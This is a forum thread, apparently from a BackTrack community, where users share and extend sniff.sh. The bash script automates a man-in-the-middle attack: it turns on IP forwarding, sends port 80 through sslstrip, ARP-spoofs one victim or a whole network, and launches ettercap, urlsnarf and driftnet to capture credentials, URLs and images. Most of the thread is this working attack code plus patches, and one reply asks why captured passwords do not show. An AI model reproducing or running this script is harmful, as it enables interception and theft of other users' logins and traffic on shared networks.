Tool I wrote sniff.sh

[ghero]

Hello,

I wrote small script that uses sslstrip, arpspoof and ettercap for sniffing https ...
I got tired of typing these 3 commands all the time


Here is the script:

Code:

#!/bin/bash

# Script for sniffing https connections.
# Script uses Arpspoof, SSLStrip and Ettercap.
# Tested on BT4 R2
# BY gHero
# Ver 0.1

# ASCII sniff.sh
echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
 /  ___//    \|  \   __\\   __\     /  ___/  |  \
 \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address:"; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address:"; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>:"; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

Version 0.2
# CodeName = cseven

Code:

#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
              .__  _____  _____           .__
  ______ ____ |__|/ ____\/ ____\     _____|  |__
 /  ___//    \|  \   __\\   __\     /  ___/  |  \
 \___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
     \/     \/                   \/     \/     \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &

Thanks Cseven and Spudgunman..

And here is video of script:
sniff.sh on Vimeo

[cseven]

sometimes the simplest scripts are the best, anyone just learning can easily see what the commands are without having to dissect a more involved script.

Here's a simple addition for URLSNARF

Code:

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

[VulcanX]

Awesome Ghero excellent work, I will test it out at home fully

Im curious as to why you using xterm though? Sorry for my noobness Im trying my hand at sum scripting and its not simple at all :P

[christ044]

VulcanX, this could be of use to you, found it when doing a little scriptting myself

bash commands - Linux MAN Pages

[Citruspers]

Nice one. I'm still kind of a noob with bash scripting but this was pretty easy to follow.

[Archangel-Amael]

Moved to experts section, and changed title.

[sLiPpErY]

Did you see my tool? http://www.backtrack-linux.org/forum...4x0r-tool.html it has this incorporated into it basically.. you can always add to it, if you do let me know so I can get it added, I'll add your name into it aswell.

[yeehawjared]

ascii art FTW. Now code it in python or perl

[VulcanX]

From previous MITM attacks I have done the username/password appeared on the screen. Here I cannot trace it?
I even tried to check the ssl_log.txt and thats only the SSL certificate info. Am I missing something?

[cseven]

Added option to ARP a Target or Network:

Replace #Arpsoof section with:

Code:

# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi